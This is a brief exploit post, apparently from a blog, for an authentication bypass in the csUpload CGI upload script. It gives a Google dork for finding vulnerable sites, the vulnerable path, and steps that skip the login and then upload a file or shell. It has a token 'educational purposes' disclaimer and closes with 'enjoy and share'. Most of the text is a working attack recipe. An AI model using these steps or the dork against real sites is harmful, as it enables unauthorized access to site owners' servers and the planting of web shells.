csUpload Script Site Authentication Bypass
Note: only for educational purposes don't hack others website.
Exploit Title: csUpload Script Site Authentication Bypass
Google Dork: CSUpload.cgi?command=
Date: 4/9/2014
Exploit Author: Satanic2000
Vendor Homepage: http://www.cgiscript.net
Software Link: http://www.cgiscript.net/cgi-
script/csNews/csNews.cgi?
database=cgi.db&command=viewone&id=12
Tested on: linux
vuln: Site.com/[path]/CSUpload/CSUpload.cgi
[path] : /cgi-script/ or /cgi-bin/ or None
Example:
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi3- Select Database Select Databases And Upload (File,Or Shell)
enjoy and share :)
0 comments:
Post a Comment